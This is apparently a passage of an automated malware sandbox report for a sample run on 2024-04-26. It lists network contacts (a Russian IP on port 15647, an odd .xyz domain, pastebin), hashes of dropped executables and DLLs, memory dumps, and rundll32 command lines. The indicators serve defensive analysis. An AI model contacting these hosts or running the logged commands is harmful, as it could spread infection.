| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.574859385.xyz | udp |
| GB | 37.221.125.202:443 | c.574859385.xyz | tcp |
| US | 8.8.8.8:53 | 202.125.221.37.in-addr.arpa | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| RU | 91.215.85.66:15647 | tcp | |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| US | 8.8.8.8:53 | 45.87.157.20.in-addr.arpa | udp |
| FR | 143.244.56.49:443 | download.iolo.net | tcp |
| US | 8.8.8.8:53 | 49.56.244.143.in-addr.arpa | udp |
| RU | 91.215.85.66:15647 | tcp | |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.145:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | 145.155.9.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\load.bat
| MD5 | c03b3682569c40524152ba0ea7bc25ff |
| SHA1 | 670c137c03ade8b573e4084c12dcb1d00e377c20 |
| SHA256 | 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f |
| SHA512 | 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a |
memory/1732-16-0x0000000002DD0000-0x0000000002E06000-memory.dmp
memory/1732-17-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/1732-19-0x0000000002EF0000-0x0000000002F00000-memory.dmp
memory/1732-18-0x0000000002EF0000-0x0000000002F00000-memory.dmp
memory/1732-20-0x00000000058E0000-0x0000000005F08000-memory.dmp
memory/1732-21-0x0000000005F50000-0x0000000005F72000-memory.dmp
memory/1732-22-0x0000000006020000-0x0000000006086000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_azlpfouc.lgs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1732-28-0x0000000006090000-0x00000000060F6000-memory.dmp
memory/1732-33-0x0000000006200000-0x0000000006554000-memory.dmp
memory/1732-34-0x00000000066D0000-0x00000000066EE000-memory.dmp
memory/1732-35-0x0000000006720000-0x000000000676C000-memory.dmp
memory/1732-36-0x0000000007F10000-0x000000000858A000-memory.dmp
memory/1732-37-0x0000000006BC0000-0x0000000006BDA000-memory.dmp
memory/1732-40-0x0000000073B10000-0x00000000742C0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/4384-43-0x0000000005340000-0x0000000005350000-memory.dmp
memory/4384-42-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/4384-53-0x0000000006300000-0x0000000006654000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0c83cc8b95f9ca9b75499438b45880c2 |
| SHA1 | 8973f5474624292ebccc9c7149d768b739d4df73 |
| SHA256 | e830a032f2cc93e30c235afc1ff7fa095fbccca8305a24ccc909c07d9d5e7af4 |
| SHA512 | 9bb1c97b3b77f6daefa3bf329817673eaded16efe74590cf84a97c4936fc145ee7b7e167722abace83554293b36b6886ecce84f339cd0d211bf976de0a27b7c3 |
memory/4384-57-0x0000000073B10000-0x00000000742C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | ae73eb4cbe39e4a9e28a367331329a12 |
| SHA1 | fa827d6b4f9c94dd137fc24b201259a4c8293913 |
| SHA256 | 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e |
| SHA512 | b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500 |
memory/1120-62-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/2200-64-0x00000000041A0000-0x000000000420D000-memory.dmp
memory/2200-63-0x0000000004260000-0x0000000004360000-memory.dmp
memory/1120-65-0x0000000002A30000-0x0000000002A40000-memory.dmp
memory/1120-66-0x0000000002A30000-0x0000000002A40000-memory.dmp
memory/1120-76-0x0000000005EB0000-0x0000000006204000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a89739c1fa3a1cbdab8821893a1d2ca8 |
| SHA1 | fe9c5acb5ddceb4027cdce38e1b138f7daa02ef6 |
| SHA256 | c1ef6ddd816078ef2e8cd45a5010fdd62bfbae31c7bb9e4469462033f26605ca |
| SHA512 | e6a837382e0e92cb4276298d6e36360c5c7f14d167c1dfebbabeeabc1f4755e54381f0e0a5406b955162ff7c034cc7b23984d350f67d2c687a13b69328ff15d3 |
memory/1120-78-0x00000000069C0000-0x0000000006A0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
| MD5 | 80e0fece33768e20034d106db0d36341 |
| SHA1 | ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510 |
| SHA256 | 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e |
| SHA512 | 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f |
memory/5024-88-0x0000000004210000-0x0000000004310000-memory.dmp
memory/5024-89-0x0000000004080000-0x00000000040A7000-memory.dmp
memory/1120-91-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/5024-92-0x0000000000400000-0x000000000403C000-memory.dmp
memory/816-93-0x0000000073280000-0x0000000073A30000-memory.dmp
memory/816-94-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/816-95-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/816-105-0x0000000005C80000-0x0000000005FD4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e659d112ad5453b1378a4b666ef3681 |
| SHA1 | 825343aca4d67fbb9b195a852f6dc4b6bf001907 |
| SHA256 | 2df426352af89a4120a633cbb5bfc9d1d79f6e0a2afcc7d1fd6d1a85491c271b |
| SHA512 | 2a47aca5be8a5006e7f80ffef2a8def2182aa0b30ddda1f4b81164a436d194343b0e1dcd779a01162c0553e9479724965c4dcab0cc6275b0e0435d70d8662ed2 |
memory/816-107-0x00000000066B0000-0x00000000066FC000-memory.dmp
memory/2200-108-0x0000000000400000-0x000000000405F000-memory.dmp
memory/2200-110-0x0000000004260000-0x0000000004360000-memory.dmp
memory/816-113-0x0000000073280000-0x0000000073A30000-memory.dmp
memory/816-114-0x0000000004D00000-0x0000000004D10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1p4.1.zip
| MD5 | 78d3ca6355c93c72b494bb6a498bf639 |
| SHA1 | 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e |
| SHA256 | a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001 |
| SHA512 | 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea |
C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
C:\Users\Admin\AppData\Local\Temp\u1p4.2\relay.dll
| MD5 | 10d51becd0bbce0fab147ff9658c565e |
| SHA1 | 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a |
| SHA256 | 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed |
| SHA512 | 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29 |
C:\Users\Admin\AppData\Local\Temp\u1p4.2\whale.dbf
| MD5 | a723bf46048e0bfb15b8d77d7a648c3e |
| SHA1 | 8952d3c34e9341e4425571e10f22b782695bb915 |
| SHA256 | b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422 |
| SHA512 | ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273 |
C:\Users\Admin\AppData\Local\Temp\u1p4.2\bunch.dat
| MD5 | 1e8237d3028ab52821d69099e0954f97 |
| SHA1 | 30a6ae353adda0c471c6ed5b7a2458b07185abf2 |
| SHA256 | 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742 |
| SHA512 | a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3 |
memory/3652-202-0x000000006ECE0000-0x000000006EE5B000-memory.dmp
memory/3652-203-0x00007FFF9CED0000-0x00007FFF9D0C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1p4.2\UIxMarketPlugin.dll
| MD5 | d1ba9412e78bfc98074c5d724a1a87d6 |
| SHA1 | 0572f98d78fb0b366b5a086c2a74cc68b771d368 |
| SHA256 | cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15 |
| SHA512 | 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f |
memory/3652-209-0x000000006ECE0000-0x000000006EE5B000-memory.dmp
memory/2200-210-0x0000000000400000-0x000000000405F000-memory.dmp
memory/3652-211-0x000000006ECE0000-0x000000006EE5B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\261c2d90
| MD5 | d16113abda25d68f63c28da6f0f66796 |
| SHA1 | 878ad80612b5a4cd992e6d1e28b13163eb7fcd50 |
| SHA256 | 9cc195a235418dfdb5608f0f311ec8aa957b3c1c08c1e8ac981951bffd587bf1 |
| SHA512 | 9b65dbffb0b03a8b0ccd982c6d9ed14f4b17b9309e247e61717d6b36b125943e6b9e773b17b7614ad9730738c618aa5d1ea9a04b6986d632c90056541558481a |
memory/4836-213-0x000000006ECE0000-0x000000006EE5B000-memory.dmp
memory/4836-215-0x00007FFF9CED0000-0x00007FFF9D0C5000-memory.dmp
memory/4836-218-0x000000006ECE0000-0x000000006EE5B000-memory.dmp
memory/4836-219-0x000000006ECE0000-0x000000006EE5B000-memory.dmp
memory/4836-221-0x000000006ECE0000-0x000000006EE5B000-memory.dmp
memory/4984-222-0x000000006D880000-0x000000006EAD4000-memory.dmp
memory/4984-226-0x0000000073280000-0x0000000073A30000-memory.dmp
memory/4984-227-0x0000000000700000-0x00000000007C6000-memory.dmp
memory/4984-228-0x0000000004C30000-0x0000000004CC2000-memory.dmp
memory/4984-229-0x0000000005280000-0x0000000005824000-memory.dmp
memory/4984-230-0x0000000004D30000-0x0000000004D40000-memory.dmp
memory/4984-231-0x0000000004F10000-0x00000000050D2000-memory.dmp
memory/4984-232-0x0000000004DC0000-0x0000000004E36000-memory.dmp
memory/4984-233-0x0000000004D50000-0x0000000004DA0000-memory.dmp
memory/4984-236-0x0000000073280000-0x0000000073A30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/4984-248-0x0000000004D30000-0x0000000004D40000-memory.dmp
memory/2912-249-0x0000000000A90000-0x0000000000A91000-memory.dmp
memory/2200-254-0x0000000000400000-0x000000000405F000-memory.dmp
memory/2912-274-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2912-286-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2012-287-0x00007FFF7C570000-0x00007FFF7D031000-memory.dmp
memory/2012-288-0x000001E2AFF20000-0x000001E2B3818000-memory.dmp
memory/2012-289-0x000001E2CDCF0000-0x000001E2CDD00000-memory.dmp
memory/2012-290-0x000001E2CE000000-0x000001E2CE110000-memory.dmp
memory/2012-291-0x000001E2B5540000-0x000001E2B5550000-memory.dmp
memory/2012-292-0x000001E2CDCA0000-0x000001E2CDCAC000-memory.dmp
memory/2012-293-0x000001E2B5550000-0x000001E2B5564000-memory.dmp
memory/2012-294-0x000001E2CE120000-0x000001E2CE144000-memory.dmp
memory/2012-295-0x000001E2B3C20000-0x000001E2B3C2A000-memory.dmp
memory/2012-297-0x000001E2CE2D0000-0x000001E2CE382000-memory.dmp
memory/2012-298-0x000001E2CE380000-0x000001E2CE3FA000-memory.dmp
memory/2012-296-0x000001E2CE290000-0x000001E2CE2BA000-memory.dmp
memory/2012-299-0x000001E2CE400000-0x000001E2CE462000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win7-20240221-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 236
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2348 wrote to memory of 3904 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2348 wrote to memory of 3904 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2348 wrote to memory of 3904 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3904 -ip 3904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 624
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |